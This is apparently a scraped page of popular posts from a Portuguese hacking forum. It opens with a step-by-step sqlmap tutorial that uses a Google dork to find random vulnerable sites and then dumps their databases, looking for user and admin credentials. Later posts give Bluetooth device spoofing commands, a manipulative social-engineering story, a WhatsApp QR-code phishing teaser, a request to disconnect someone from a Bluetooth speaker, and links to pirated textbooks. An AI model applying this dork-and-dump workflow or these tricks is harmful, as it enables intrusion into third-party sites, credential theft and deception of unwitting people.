https://play.google.com/store/apps/details?id=org.pocketworkstation.pckeyboard&hl=pt_BR É um teclado comum que possui coisas de um teclado de Desktop como Shift, Tab e outros... Vamos aos procedimentos Após instalar tudo da lista acima, abra o Termux e digite: apt update pode acontecer de ele dizer que o apt ainda não foi instalado, mas aí você digita isso: apt install apt (É sério '-') depois de "ativar" o nosso amigo apt, iremos instalar o python digite: apt install python e depois apt install python3 (para futuros tutoriais) Agora que temos o Pitão, vamos descolar aquele SQLmap deliciouser no termux digite: apt install git depois, vamos clonar o Rep do Sqlmap digite: git clone https://github.com/sqlmapproject/sqlmap.git quando o download terminar e você for capaz comandar esse cavalo silvestre que chamamos de terminal digite: cd sqlmap-master e pronto, se você já souber fazer ataques SQLi você já tem tudo necessário. caso não saiba aqui vai um quick tutorial (tutorial rápido em coreano)... Digite: python sqlmap.py Só pra ter certeza que está tudo ok. Depois selecione um site alvo (não tente google plmds) uma dork pra achar alvos é essa: "inurl: php?id=", Joga isso no google que é sucesso Para saber se um site pode ou não ser vulnerável adicione uma aspa no final da url, por exemplo sitedopao.com.br/index.php?id=101 você coloca uma aspa no final sitedopao.com.br/index.php?id=101' e dá enter Se der algum erro de php, há uma chance de vulnerabilidade... Voltando ao termux Digite: python sqlmap.py -u sitedopao.com.br/index.php?id=101 --dbs Esse "-u" é pra determinar que o que vem a seguir é a url do site a ser explorado o "-dbs" é pra determinar o que você quer que o SQLmap faça, nesse caso --dbs é para testar o site e trazer o nome das DB's nele presente Depois digite: python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB vem aqui" --tables Esse "-D" é pra determinar que o que vem a seguir é a Database a ser explorada o "--tables" é para testar o site e trazer o nome das tables que estão na DB And after that, type: python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB" -T "nome da tabela" --columns Esse "-T" define a tabela da DB a ser explorada o "--columns" é pra determinar que você quer saber as colunas presentes nessa tabela e por ultimo: python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB" -T "nome da tabela" -C "nome da coluna" --dump o "--dump" é pro SQLmap tentar trazer o conteúdo das tabelas **** Para pegar o conteúdo de múltiplas tabelas e só colocar "-C tabela1,tabela2,tabela3(...)tabela8008" **** Se você for ixpertinho vai procurar coisas que tenham "user", "admin", "login" e tals Mas como sempre eu tenho que te lembrar que invadir sites assim é crime, faça isso com permissão do dono do site ou procure um site de testes como por exemplo o http://testphp.vulnweb.com/ Não me responsabilizo pelos seus atos Então é isso guys, acho que amanhã saí o "Aventuras de um hasker #1" e o Mobile Hacking #2 Me digam o que acharam!! avaliem e deem criticas.... flws ~~ Bjs do Ja1
  29. 2 points
    Bem vindo. É muito bom você aprender sobre tudo mas sugiro que foque em algo pois no que focar vai ser seu ponto mais forte. Com o tempo você fica bom em tudo mas se torna especialista em algo.
  30. 2 points
    Mr. Robot, episódio 6. Como de costume, não decepcionante. Mais uma vez, nosso herói, Elliot, usou seu extraordinário intelecto e habilidades de hacking para nos inspirar. Neste episódio, Elliot está sendo chantageado pelo traficante de drogas implacável, Vera, para tira-lo da prisão. Shayla esta sendo refém e Elliot tem até a meia-noite para invadir o sistema de computador da cadeia para liberá-lo. Elliot tenta explicar a Vera que tal invasão não pode ser feita em questão de horas, mas sim dias ou semanas para encontrar uma vulnerabilidade de segurança que ele possa explorar. Pendrive malicioso Em sua primeira tentativa de invadir a prisão, Elliot e Darlene, sua parceira da Fsociety, "acidentalmente" deixam cair pendrives infectados perto da prisão. A estratégia aqui é que se alguém dentro da rede da prisão pegar um e inseri-lo no seu sistema de computador, irá ter injetado um malware e assim dando uma entrada para Elliot. Como esperado, um oficial pegou um e inseriu em seu computador. Elliot foi capaz de ter uma conexão remota, mas antes de poder fazer qualquer coisa, o software AV (antivírus) detecta a intrusão e desconecta Elliot. Elliot então questiona Darlene por ela ter pego um malware já conhecido (pelos antivírus, no caso), ao invés de desenvolver um próprio malware e então Darlene se defende dizendo que só tinha meia-hora. A rede Enquanto Elliot está visitando Vera na prisão, ele traz seu telefone com ele, no qual ele instalou um aplicativo de scanner Wi-Fi. Com esse scanner, ele pode ver todos os APs sem fio e vê que todos estão usando WPA2. Embora ele saiba que pode quebrar WPA2, porem o tempo é curto para que ele possa fazer um bruteforce na rede. No processo de descoberta de hotspots sem fio e tecnologias de criptografia com seu telefone, Elliot vê uma conexão Bluetooth quando o carro de um agente passa perto dele. Isso estimula Elliot a uma nova estratégia, invadir o Bluetooth e entrar no sistema de computador da prisão através da conexão dedicada do carro da policia à prisão. A estratégia de Elliot aqui é falsificar a conexão Bluetooth do carro da polícia com o teclado. Se ele pode fazer o laptop acreditar que seu teclado é realmente o teclado do policial, ele pode controlar o laptop do policial e entrar na rede da prisão. Uma vez dentro da rede, ele pode enviar malware para assumir o controle dos sistemas controlados digitalmente da prisão. Ativando o Bluetooth Antes que Elliot possa fazer qualquer coisa, ele precisa habilitar o Bluetooth em seu sistema: service bluetooth start Em seguida, ele precisa ativar o dispositivo Bluetooth: hciconfig hci0 up Então ele verifica se ele realmente está funcionando, digitando: hciconfig hci0 Observe o "Endereço BD" na segunda linha - este é o endereço MAC do dispositivo Bluetooth. Procurando dispositivos Bluetooth A primeira coisa que Elliot no processo de invasão é procurar conexões Bluetooth. Se você olhar de perto a tela de Elliot, você pode ver que ele está usando o hcitool, uma ferramenta de configuração Bluetooth integrada no Kali Linux. Embora isso funcione, tive um melhor desempenho com o btscanner, um scanner Bluetooth. Para usá-lo, digite: btscanner Em seguida, selecione "i" para iniciar uma verificação de inquérito. Você pode ver os resultados abaixo. Usando o btscanner, podemos obter uma lista de todos os dispositivos Bluetooth por perto. Este aqui tem um endereço MAC e um nome de "Tyler" - para falsificar este dispositivo, devemos falsificar o endereço MAC e o nome do dispositivo. É assim que Elliot recebe o endereço MAC e o nome do dispositivo Bluetooth do carro do policial. Lembre-se de que o Bluetooth é um protocolo de baixa potência com um alcance de apenas cerca de 10 metros (embora com uma antena direcional, distâncias até 100 metros foram alcançadas). Spoof o endereço MAC do teclado Agora que Elliot tem o nome e o endereço MAC do teclado do policial, ele precisará clonar o teclado do policial com essas informações. O Kali Linux possui uma ferramenta projetada para spoof de dispositivos Bluetooth chamados de spooftooph. Podemos usá-lo para falsificar o teclado com um comando semelhante a este: spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537 -i Determina o dispositivo, neste caso hci0 -a Determina o endereço MAC que queremos falsificar -n Determina o nome do dispositivo que queremos falsificar, neste caso "Car537" Se o fizermos corretamente, nosso dispositivo Bluetooth irá falsificar o endereço MAC e o nome do dispositivo Bluetooth do computador do policial. Para verificar se foi bem sucedido, podemos usar o hciconfig seguido do dispositivo e o "nome" do switch que irá listar o nome do dispositivo. Lembre-se, este é o nosso dispositivo Bluetooth que estamos tentando emular com o dispositivo Bluetooth do carro de polícia. Se tivermos sucesso, ele terá o mesmo endereço MAC e o nome do dispositivo Bluetooth do policial. hciconfig hci0 name Agora, temos um dispositivo Bluetooth que é um clone perfeito do teclado Bluetooth do carro da polícia! O link do serviço bluetooth para o laptop do policial Agora é aqui onde o roteiro e realidade de Mr. Robot se divergem. O hacking de Mr. Robot é realista, porém as vezes, o diretor precisa deixar as coisas um pouco mais fictícias. E isso é permitido pois as obras não devem se limitar pela realidade. Para que o Eliot se conecte agora ao laptop do carro de polícia, ele precisaria da chave de link (esta é uma chave para identificar o dispositivo Bluetooth previamente emparelhado) que foi trocada entre o teclado e o adaptador Bluetooth no laptop. Ele poderia adivinhar (improvável) ou crack-lo, mas não será tão rápido como apareceu no show. Outra possibilidade é que, quando o sistema foi reiniciado ou o teclado foi desconectado, Elliot pode se conectar ao laptop, pois é um clone do teclado do policial. Em ambos os casos, levaria mais tempo do que Elliot tinha neste episódio para cortar o teclado Bluetooth do policial. Hackeando a prisão Na etapa final, Elliot usa o computador hackeado do policial para fazer upload de um malware via FTP, que lhe dará o controle das portas das celas da prisão. Poucas pessoas sabem que prisões e outros sistemas industriais, muitas vezes usam SCADA (Sistemas de Supervisão e Aquisição de Dados). Estes sistemas industriais possuem PLCs. Presumivelmente, essa prisão tinha PLCs controlando as portas das celas da prisão (uma suposição muito razoável) e o malware de Elliot infectou-os e lhe deu controle, permitindo-lhe abrir todas as celas, liberando Vera e todos os outros prisioneiros.
  31. 2 points
  32. 2 points
    Salve rapeize, tudo na paz? Ando um pouco offline, mas estes dias achei uma apostila bem legal sobre testes de invasão em redes wireless e achei que pudesse ser útil pra vocês. Pic Chamativa. Link para ver online: https://docslide.com.br/documents/teste-de-invasao-em-redes-sem-fio-80211.html O link para download está em anexo ao tópico. docslide.com.br_teste-de-invasao-em-redes-sem-fio-80211.pdf
  33. 2 points
    Podem me chamar pelo meu nick. Estou aqui para fazer amigos e permutar conhecimentos. Sou estudante de Redes de Computadores e termino este ano... Bem, vamos ser amigos? ;)
  34. 2 points
    SERVIDOR: GOOGLE DRIVE ---------------------------MATEMÁTICA--------------------------- Cálculo - James Stewart vol1. e vol.2 Com pdf das resoluções LINK:Download Curso de Cálculo - Guidorizzi vol1 Curso de Cálculo - Guidorizzi vol2 Curso de Cálculo - Guidorizzi vol3 Curso de Cálculo - Guidorizzi vol4 LINK:Download Cálculo A - Diva Fleming .Ed.6 LINK:Download Livro - Cálculo com Geometria Analítica - Leithold e soluções em pdf LINK:Download Cálculo - George Thomas vol.1 Cálculo - George Thomas vol.2 LINK:Download Livro - Introdução a Álgebra Linear - Alfredo Steinbruch e Paulo Winterle LINK:Download Livro - Álgebra Linear Boldrini LINK:Download Livro - Álgebra Linear - Alfredo Steinbruch LINK:Download Pré-Cálculo Demana LINK:Download Fundamentos de Matemática Elementar - Vol. 7 - Geometria Analítica {Exercícios resolvidos Exercícios propostos com resposta} LINK:Download Geometria Analítica - Steinbruch e Winterle {297 Exercícios propostos 82 Exercícios resolvidos} LINK:Download Fundamentos de Matemática Elementar - Vol. 5 - Combinatória e probabilidade {Exercícios resolvidos Exercícios propostos com resposta} LINK:Download Pré-Calculo Paulo Boulos LINK:Download Fundamentos de Matemática Elementar - Vol.10 - Geometria Espacial LINK:Download Fundamentos de Matemática Elementar - Vol. 9 - Geometria Plana {41 exercicios resolvidos 971 exercícios propostos com resposta 373 testes de vestibulares com resposta} LINK:Download Earl Swokowski - Cálculo com Geometria Analítica - Vol. 1 - 2ª Edição LINK:Download Calculus Made Easy Thompson LINK:Download Calculus - Spivak LINK:Download Calculo Diferencial e Integral Vol 1 - N. Piskounov LINK:Download Cálculo - Análise Matemática - Demidovitch LINK:Download Cálculo Diferencial e Integral de Funções de Várias Variáveis (Diomara Pinto e Maria Cândida F. Morgado) - 3ª edição LINK:Download Cálculo 1 para leigos LINK:Download Cálculo 2 para leigos LINK:Download Tom Apostol - Calculus vol1 e vol2 (Inglês) + Soluções LINK:Download Curso de Álgebra Linear - Fundamentos e Aplicações - Goldfeld Cabral LINK:Download Geometria analítica e Álgebra linear - Elon Lages LINK:Download Álgebra Linear e Aplicações - Callioli LINK:Download Álgebra Linear, Elon Lages Lima LINK:Download Algebra Linear - Hoffman e Kunze LINK:Download Cálculo Volume 1 e Volume 2 (Com resoluções) - Howard Anton, Irl Bivens, Stephen Davis - 8ª Edição LINK:Download Granville - Elementos do Cálculo LINK:Download Cálculo Um Curso Moderno e Suas Aplicações - Hoffmann e Bradley LINK:Download Pré-Cálculo para Leigos LINK:Download Equações Diferenciais - com Aplicações em Modelagem - Dennis G. Zill LINK:Download Equações Diferenciais Vol. 1 e Vol. 2 - Dennis G. Zill e Michael R. Cullen LINK:Download Equações Diferenciais Dennis G.Zill LINK:Download Equações Diferenciais - Coleção Schaum LINK:Download Abramo Hefez - Curso de Álgebra Vol 1 e Vol 2 LINK:Download Elementos de Álgebra - Arnaldo Garcia & Yves Lequain LINK:Download Elementos de Aritmética - Abramo Hefez LINK:Download Introdução a Teoria Dos Números - Jose Plinio de Oliveira LINK:Download Introdução a Álgebra Abstrata LINK:Download Morettin e Bussab - Estatística Básica 6ed LINK:Download Probabilidade um curso moderno com aplicações 8ed Ross LINK:Download Introdução Teoria Da Probabilidade - Hoel Port Stone LINK:Download Estatística Básica - A Arte de Trabalhar com Dados LINK:Download Geometria Analítica - Reis e Silva - Ed2 LINK:Download Geometria vol 1 e 2 Morgado LINK:Download Vetores e Geometria Analítica - Paulo Winterle LINK:Download Matemática Discreta Coleção Schaum 2ed - Seymour Lipschutz e Marc Lipson LINK:Download Análise Combinatória e Probabilidade - Morgado LINK:Download Problemas e Exercícios de Análise Matemática - Demidovitch LINK:Download Principles of Mathematical Analysis Walter Rudin (Inglês) E (Espanhol) LINK:Download Análise Real vol.1, 2 e 3 (Elon Lages Lima) Com soluções do vol.1 LINK:Download ---------------------------FÍSICA-------------------------- Curso de Física Básica - Moyses - 1ª Ed. - Vol. 1 - Mecânica Curso de Física Básica - Moyses - 4ª Ed. - Vol. 2 - Fluídos, osilações e ondas calor Curso de Física Básica - Moyses - 1ª Ed. - Vol. 3 - Eletromagnetismo Curso de Física Básica - Moyses - 1ª Ed. - Vol. 4 - Ótica, Relatividade e Física Quântica LINK:Download Física 1 - Young e Freedman - Mecânica - 12ªed Física 2 - Young e Freedman - Termodinâmica e ondas - 12ªed Física 3 - Young e Freedman -Eletromagnetismo - 12ªed Física 4 - Young e Freedman - Ótica e Física moderna - 12ªed (Com soluções) LINK:Download Fundamentos de Física 9ª Edição Vol 1 - Halliday - Mecânica Fundamentos de Física 9ª Edição Vol 2 - Halliday - Gravitação, ondas e termodinâmica Fundamentos de Física 9ª Edição Vol 3 - Halliday - Eletromagnetismo Fundamentos de Física 9ª Edição Vol 4 - Halliday - Óptica e Física moderna (Com soluções) LINK:Download Os Fundamentos da Física - Vol. 1 - - Mecânica - 9ªEd. RAMALHO Os Fundamentos da Física - Vol. 2 - - Termologia, óptica e ondas - 9ªEd. RAMALHO Os Fundamentos da Física - Vol. 3 - - Eletricidade, introdução a Física moderna e Análise dimensional - 9ªEd. RAMALHO (Com soluções) LINK:Download ópicos de Física - Mecânica - Vol 1 - Helou, Gualter e Newton Tópicos de Física - Termologia, Ondulatória e Óptica - Vol 2 - Helou, Gualter e Newton Tópicos de Física - Eletricidade, Física Moderna e Análise Dimensional - Vol 3 - Helou, Gualter e Newton (Com soluções) LINK:Download Curso de Física Vol 1, 2 e 3 - Antônio Máximo e Beatriz Alvarenga LINK:Download Lições de Física de Feynman - Vol1, 2, 3 e 4 LINK:Download
  35. 2 points
    Recomendo a documentação da linguagem, pois muitos livros PDF em pt-br estão desatualizados, a não ser que saiba inglês aí terá bastante Pode baixar a documentação em pt-br no site do PHP http://php.net/download-docs.php
  36. 2 points
    Salve rapaziada queria saber como faço para derrubar uma conexão bluetooth, por exemplo eu tenho um cara conectado em uma caixa de som bluetooth e queria desconectar ele e me conectar desde já agradeço quem ajudar .
  37. 2 points
    E ae galera gostei bastante do fórum pois esclareceu algumas dúvidas e aqui estou pra também colaborar
  38. 2 points
    Olá amiguinhos, tudo bem? Vou contar como usei e aperfeicoei minhas técnicas de engenharia social para conseguir benefícios no meu cotidiano ao longo dos anos. Isso inclui coonseguir desde a senha do Wifi, até sexo com as amiguinhas <3 Antes de tudo uma pausa para um comercial dos nossos patrocinadores Bom, primeiro eu devo-lhe advertir que isso não é feito de má intenção ou que vise prejudicar alguém, é apenas utilizar da psicologia humana para tornar as pessoas mais flexíveis. (todos sabemos que humanos são egoístas). 1 - Da que eu te dou outra. Vou usar como exemplo um caso recente. Em março deste ano (2017) eu conversei com o @Apoc a respeito da necessidade de Fabricar camisetas para angariar fundos para o projeto e obviamente, renovar o contrato dos servidores que acaba em setembro. Daí, então eu fui a uma loja para fazer um orçamento e conversa vai, conversa vem... Precisei mostrar a estampa para a recepcionista da confcção (estava no google Drive), sem um pacote de dados eu precisava de wifi (olhei pro roteador dela na hora) e na maior naturalidade eu pedi a senha para que pusesse acessar a rede e mostrar a estampa e a moça simplesmente me falou a senha, mesmo sem compromisso algum comigo. Ou seja, eu ganhei acesso a uma rede privada apenas PEDINDO, obviamente não foi apenas um pedido, mas um pedido contextualizado. Blz, mas e daí? -E daí que é disso que você precisa! Uma situação pra justificar o seu pedido. Eu vou explicar de uma forma que você possa compreender. Segundo a psicologia humana, As pessoas tendem a ser avessas as outras caso notem algum interesse da sua contra-parte. Ex: Quando você pede algo para alguém desconhecido a primeira reação da pessoa é negar. Afinal, ela nem te conhece, porém, se você oferecer algo antes, sem pedir nada em troca, a pessoa adotará uma posição flexivel aos seus próximos pedidos, resumindo. ANTES DE PEDIR UM FAVOR, FAÇA UM SEM COBRAR NADA! Aquela pessoa que você beneficiou (ou que de alguma forma se propôs a beneficiar, como a recepcionista da confeção seria beneficiada com um cliente novo) se sentirá em divida com você e não saberá negar um pedido simples ou que não cause danos. Essa técnica da senha do Wi-Fi pode ser usada em qualquer lugar, você só precisa criar uma situação favorável para si e desfavorável para o alvo. Algo similar ao ataque de Kevin Mitnick à Motorola. A parte de conseguir sexo com as amiguinhas eu conto outro dia, pq é preciso ensinar mais alguns truques de comportamento, autocontrole emocional e também uma lista imensa do que não fazer.
  39. 2 points
    Como hackear WhatsApp? - Phishing no WhatsApp com QRL_Jacking Hackear WhatsApp... Um tema, peculiar, não? A gente pode pensar em várias estratégias... Backdoor APK, por exemplo, é uma alternativa... Mas, e se eu te dissesse que tem como vocêHackear WhatsApp com Phishing, o que você diria? - "Ah, Face... Você tá louco... É impossível Hackear WhatsApp dessa forma..." Pois é meu querido... Tem como! Para realizar esse ataque, você precisa utilizar a ferramenta QRL Jacking, que é uma ferramenta própria para aplicação de engenharia social em aplicações com QR code, como forma de login. Sabendo disso, a gente pode utilizar essa ferramenta para realizar um ataque no serviço WhatsApp Web e conseguir Hackear Whatsapp. Veja como:
  40. 2 points
    Salve hackudões de plantão. Para boa convivência de todos, devemos seguir algumas regrinhas básicas e simples para que ninguém cometa homicídio neste recinto. Regras de convivência: - Jamais ofender, xingar e/ou agredir o coleguinha; - Você é livre para postar sua opinião mas não pode impor a mesma sobre os demais. Regras para Posts: - Não postar pornografia infantil, warez, gore e qualquer outro tipo de conteúdo doente; - Não fazer spam; - Não anexar arquivos "batizados", se a administração pegar você se tornará um alvo de 20 mil pessoas. Use o conhecimento de forma sadia e aproveite a quantidade enorme de conteúdo que temos aqui. Best regards.
  41. 2 points
    Olá amigos. Trago um curso básico com total de trinta videos sobre programação em Shell. O canal da Bóson Treinamentos para quem não conhece, é uma ótimo canal de tecnologia e afins, tem muita coisa sobre programação, linux, redes, segurança e outros, se quiser dar uma olhada: Canal - Bóson Treinamentos. Voltando (kkk), deixo o link da playlist para que possam estudar. O conteúdo é bem bacana e bem explicado. Boa sorte e bons estudos. >>>>>>Shell Scripting - Playlist<<<<<<
  42. 2 points
    Pessoal, essa é a playlist do meu canal, que mostra comandos básicos pra quem quer dominar o terminal. Entendendo e praticando os comandos dos 5 vídeos, eu garanto a você que será capaz de navegar pelo terminal e realizar diversas ações, sozinho.
  43. 2 points
    Github https://github.com/gordonrs/thc-secure-delete
  44. 1 point
    Arch Bang ArchBang é uma distribuição GNU/Linux simples que fornece a você um leve sistema Arch Linux combinado com o gerenciador de janelas Openbox. Adequado tanto para desktop e sistemas portáteis - É rápido, estável e sempre atualizado. Você pode personalizar a instalação para atender às suas necessidades e aproveitar os vastos recursos e conhecimentos da comunidade Arch Linux. A página de download tem links para ambos os 32 e 64 bits, de arranque como um live CD/USB - permitindo que você facilmente testá-lo antes de fazer uma instalação completa. Experimente-o agora, temos certeza que você vai se surpreender com o que ArchBang tem para oferecer! Download: http://sourceforge.net/projects/archbang/files/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Arch Linux Arch Linux é uma distribuição fundada por Judd Vinet e é otimizada para processadores i686 (Pentium Pro, II etc e AMD compatíveis). Judd inspirou-se em uma distribuição chamada CRUX. Arch é uma distribuição rolling release, ou seja, o sistema é atualizado continuamente. Você obterá acesso às novas versões simplesmente mantendo o sistema atualizado através do gerenciador de pacotes. Utiliza o Pacman (Package manager - gerenciador de pacotes) que torna fácil a tarefa dos usuários personalizarem o sistema. O número de fiéis usuários tem crescido devido as suas inúmeras qualidades e sua filosofia de desenvolvimento. Download: https://www.archlinux.org/download/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ BackBox Backbox é uma distribuição baseada no Ubuntu, desenvolvido para executar testes de penetração e realizar avaliações de segurança. Projetado para ser rápido, fácil de usar e fornecer um ambiente desktop completo graças ao seu repositório de software próprio, sempre atualizado para as últimas versões estáveis das mais conhecidas e utilizadas ferramentas de "hacking ético". Pode ser iniciada diretamente pelo CD. Download: http://www.backbox.org/downloads ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Backtrack Backtrack, distribuição com foco em testes de seguranças e testes de penetração (pen tests), muito apreciada por hackers e analistas de segurança, podendo ser iniciado diretamente pelo CD (sem necessidade de instalar em disco), mídia removível (pendrive), máquinas virtuais ou direto no disco rígido. Download: http://www.backtrack-linux.org/downloads/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ CentOS CentOS é uma distribuição de classe Enterprise derivada de códigos fonte gratuitamente distribuídos pela Red Hat Enterprise Linux e mantida pelo CentOS Project. CentOS proporciona um grande acesso aos softwares padrão da indústria, incluindo total compatibilidade com os pacotes de softwares preparados especificamente para os sistemas da RHEL. Isso lhe dá o mesmo nível de segurança e suporte, através de updates, que outras soluções Enterprise, porém sem custo. Download: http://www.centosbr.org/downloads ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Coyote Linux Coyote Linux é uma pequena distribuição desenvolvida pela Vortech Consulting contendo apenas os serviços necessários para transformar um computador em um roteador de rede ou firewall. Download: http://coyotelinux.com/downloads/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Debian Debian é uma das distribuições mais antigas e populares. Ela serviu de base para a criação de diversas outras distribuições populares, tais como Ubuntu e Kurumin. Como suas características de maior destaque podemos citar: Sistema de empacotamento .deb; Apt-get, que é um sistema de gerenciamento de pacotes instalados mais práticos dentre os existentes (se não o mais!); Sua versão estável é exaustivamente testada, o que o torna ideal para servidor (segurança e estabilidade); Possui um dos maiores repositórios de pacotes dentre as distros (programas pré-compilados disponíveis para se instalar). Download: http://www.br.debian.org/CD/http-ftp/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Fedora Fedora é uma das mais populares e estáveis distribuições que existem atualmente. Ele era, no começo, um fork para a comunidade, liberado e mantido pela gigante Red Hat que, na época, estava fechando seu sistema e concentrando-se no mercado corporativo. Isso significa que, desde o princípio, o Fedora já contava com o que há de mais moderno em tecnologia de software, assim como também contava com uma das mais competentes e dedicadas equipes em seu desenvolvimento. Se o que você procura é uma distribuição com poderes de ser um servidor estável, mas com as facilidades das ferramentas de configuração gráficas, ou se, simplesmente, deseja um desktop mais robusto, o Fedora será a sua melhor escolha. Download: http://fedoraproject.org/get-fedora ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ FreeBSD O FreeBSD é um sistema operacional livre do tipo Unix descendente do BSD desenvolvido pela Universidade de Berkeley. Está disponível para as plataformas Intel x86, DEC Alpha, Sparc, PowerPC e PC98 assim como para as arquiteturas baseadas em processadores de 64bits IA-64 e AMD64. Considerado como robusto e estável, geralmente é utilizado em servidores, como de Internet ou Proxies, mas também pode ser utilizado como estação de trabalho. Download: http://www.freebsd.org/where.html ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Gentoo Gentoo é uma metadistribuição baseada no sistema gerenciador de pacotes portage. A nomenclatura usada no desenvolvimento do sistema e seus produtos é inspirada na espécie de pinguim Gentoo. O gerenciamento de pacotes no Gentoo é desenhado para ser modular, portátil, fácil de manter, flexível e otimizado para a máquina usuária. Diferentemente da maioria das distribuições de software, normalmente os pacotes são compilados a partir do código fonte, mantendo a tradição dos ports (em inglês) nos sistemas BSD, embora por conveniência, alguns pacotes grandes são disponibilizados também como binários pré-compilados para várias arquiteturas. O Gentoo descreve-se como uma metadistribuição, "devido a sua adaptabilidade quase ilimitada". Download: http://www.gentoo.org/main/en/where.xml ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ LinuxMint Linux Mint é uma distribuição baseada no Ubuntu, com o qual é totalmente compatível e partilha os mesmos repositórios. Diferencia-se do Ubuntu por incluir drivers e codecs proprietários por padrão e por alguns recursos que permitem fazer em modo gráfico configurações que no Ubuntu são feitas de modo texto. Utiliza por padrão o desktop Gnome modificado, com um menu no painel inferior junto à barra de tarefas, similar ao menu K do KDE. O propósito da distribuição é providenciar um sistema Linux que funcione "out-of-the-box"; isto é, esteja pronto para uso assim que terminar a instalação. Dessa maneira, o único trabalho do usuário será o de personalizar a aparência, se desejar, e instalar programas extra, caso necessite. Download: http://www.linuxmint.com/download.php ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Lubuntu Lubuntu é um projeto derivado do Ubuntu, uma distribuição do sistema operacional GNU/Linux. Seu diferencial está em seu desenvolvimento, que foca netbooks, dispositivos móveis e os micros mais antigos, com menos de 256 MB de RAM. A interface utilizada é o LXDE, que segue os mesmos padrões gráficos do KDE, mas apesar de ser para micros mais velhos ou com pouco poder de processamento, não significa que o ambiente seja sem efeitos visuais, pelo contrario, ele possui efeitos visuais bons. Mais informações (inglês): http://lubuntu.net/ | https://wiki.ubuntu.com/Lubuntu Download: http://people.ubuntu.com/~gilir/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Mageia Distribuição de origem francesa criada por ex-funcionários e colaboradores da Mandriva. Ao contrário do Mandriva, que é uma entidade comercial, o projeto Mageia é um projeto da comunidade e uma organização sem fins lucrativos cujo objetivo é desenvolver um sistema operacional livre baseado em Linux. A distribuição vêm apresentando um crescimento acentuado de acordo com o Hit Ranking do site Distrowatch.com. Download: http://www.mageia.org/pt-br/downloads/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Mandriva Mandriva é uma das maiores distribuições da atualidade, nasceu da fusão entre o antigo Mandrake e a brasileira Conectiva. A Empresa Francesa Mandriva se dedica à distribuição e suporte do sistema operacional Mandriva, tem sua sede administrativa em Paris e um centro de desenvolvimento em Curitiba no Brasil, o laboratório brasileiro recebe o nome de Mandriva Conectiva, a Mandriva também possui um escritório em San Diego nos Estados Unidos. O Mandriva conta também com um grande número de contribuidores pelo mundo, o público-alvo do Mandriva Linux engloba usuários iniciantes no mundo Linux assim como usuários com mais experiência. Download: http://www2.mandriva.com/br/downloads/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Manjaro Manjaro nasce na Europa com uma equipe de desenvolvedores jovens que oferece uma distribuição GNU/Linux baseada nos pacotes estáveis do Arch, tornando-o 100% compatível com essa distribuição. Embora o Manjaro não seja um Arch, segundo Philip Müller, o objetivo dele é oferecer uma alternativa simples aos usuários que gostam das características do Arch como a sua velocidade, os seus pacotes sempre atualizados, a sua leveza e o seu princípio KISS/Rolling Release. Ademais essa distribuição apresenta um visual moderno e agradável, com um instalador simples e que usa o cada vez mais popular escritório XFCE como ambiente gráfico padrão. Todavia a equipe também oferece o Manjaro Linux com os escritórios KDE, Gnome/Cinnamon, OpenBox e outros ambientes gráficos. Download: http://sourceforge.net/projects/manjarolinux/files/release/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Matriux É uma distribuição de segurança, caracterizando-se inteiramente em ferramentas gratuitas, poderosas e open source que podem ser usadas para os mais diversos fins, como por exemplo, testes de penetração, para hackers éticos, para adminstração de sistemas e rede, para investigações forenses de crimes cybernéticos, análise de vulnerabilidades e muito mais. É uma distribuição projetada para profissionais e entusiastas em segurança, embora possa ser usado normalmente como seu sistema desktop padrão, Matriux possui essa flexibilidade. Com Matriux você pode transformar qualquer sistema desktop em um poderoso conjunto de ferramentas de testes de penetração sem ter que instalar nenhum software em seu HD (Hard Disk). Matriux foi projetado para funcionar em um ambiente com um LiveCD/DVD ou com pendrive, podendo também ser instalado em seu disco rígido em apenas algumas etapas. Matriux também inclui um conjunto de ferramentas para forense e recuperação de dados que podem ser usadas para investigações e análises forenses e recuperação de dados. Download: http://www.matriux.com/index.php?page=download ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ openSUSE openSUSE é a versão livre do belíssimo sistema operacional Novell SuSE. Além de se comportar de forma muito estável e robusta como servidor, também é muito poderoso quando o assunto é desktop. Seu diferencial é o famoso YaST (Yeah Another Setup Tool), um software que centraliza todo o processo de instalação, configuração e personalização do sistema Linux. Podemos dizer que esta é uma das cartas-mestre do SuSE, pois pode se comparar ao painel de controle do Windows. Download: http://software.opensuse.org/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Sabayon Sabayon é um Sistema GNU/Linux completo, baseado no Gentoo. É uma espécie de "Gentoo Full", ao mesmo tempo binário, semi-binario e de compilação. Embora possa usar Portage (comando emerge), tem um Gerenciador de Pacotes próprio, chamado Entropy (comando equo) que instala (binários) e/ou adapta (semi-binários) pacotes tipo Gentoo, usando a própria infraestrutura local do Portage. O Sabayon é conhecido por duas características principais: grande quantidade de aplicativos e beleza ímpar. É considerada uma das Distros mais bonitas do Mundo e também já foi uma das mais utilizadas. Parte do seu sucesso se deve ao fato de ter uma grande quantidade de aplicativos nativos, incluindo vários jogos e efeitos 3D. Download: http://www.sabayon.org/mirrors ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Slackware Slackware, junto com Debian e Red Hat, é uma das distribuições "pai" de todas as outras. Idealizada por Patrick Volkerding, Slack - apelido adotado por sua comunidade de usuários - tem como características principais leveza, simplicidade, estabilidade e segurança. Embora seja considerada por muitos uma distribuição difícil de se usar, voltada para usuário expert ou hacker, possui um sistema de gerenciamento de pacotes simples, assim como sua interface de instalação, que é uma das poucas que continua em modo-texto, mas nem por isso se faz complicada. Download: http://www.slackware.com/getslack/ 